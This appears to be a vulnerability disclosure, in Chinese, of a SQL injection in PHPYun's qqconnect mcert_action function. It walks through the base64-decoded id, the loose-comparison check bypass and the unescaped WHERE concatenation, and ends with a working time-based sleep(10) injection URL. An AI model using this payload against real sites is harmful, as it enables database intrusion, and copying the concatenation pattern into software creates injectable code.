### 简要描述: 问题很类似,官方安全意识有待加强 ### 详细说明: 问题出现在/model/qqconnect.class.php的mcert_action函数中: ``` function mcert_action(){ $id=$_GET['id']; $arr=@explode("|",base64_decode($id)); if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){ $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'"); $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证"); }else{ $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2"); } } ``` id从$_GET['id']参数中取出然后经过了base64解码并分隔进入数组$arr,由于是base64解码所以绕过前端过滤: ``` $id=$_GET['id']; $arr=@explode("|",base64_decode($id)); ``` 然后经过一段判断: ``` if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']) ``` $this->config['coding']默认为null,而这里用的是宽松比较`==`,未定义的$arr[2]取值也是null,所以只要$arr[2]为null这个判断就可以通过,判断通过后进入以下语句: ``` $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'"); ``` 跟进DB_update_all: ``` function DB_update_all($tablename, $value, $where = 1) { $SQL = "UPDATE `" . $this->def . $tablename . "` SET ".$value." WHERE ".$where; $this->db->query("set sql_mode=''"); $return=$this->db->query($SQL); return $return; } ``` 跟进query: ``` /*数据库执行语句,可执行查询添加修改删除等任何sql语句*/ public function query($sql) { if ($sql == "") { $this->show_error("SQL语句错误:", "SQL查询语句为空"); } $this->sql = $sql; $result = mysql_query($this->sql, $this->conn); if (!$result) { //调试中使用,sql语句出错时会自动打印出来 if ($this->show_error) { $this->show_error("错误SQL语句:", $this->sql); } } else { $this->result = $result; } if(1==1){ global $starttime; $dbbug_error2[]=" "; $dbbug_error2[sql]=$this->sql." "; $dbbug_error2["time"]=$this->getmicrotime()-$starttime." 
"; //$dbbug_error2[]=" "; //print_r($dbbug_error2);//查看sql语句 $this->debug=$dbbug_error; } return $this->result; } ``` 可以看到,$arr[0]未经任何转义或整型校验就被直接拼接进WHERE子句,而query()又把拼接后的SQL原样交给mysql_query执行,注入由此发生 ### 漏洞证明: 提交 ``` http://www.target.com/index.php?M=qqconnect&C=mcert&id=JyBvciBzbGVlcCgxMCk7I3x6dHo%3D ``` 后台会执行sleep(10) ``` UPDATE `phpyun_member` SET `email_status`='1' WHERE `uid`='' or sleep(10);# ```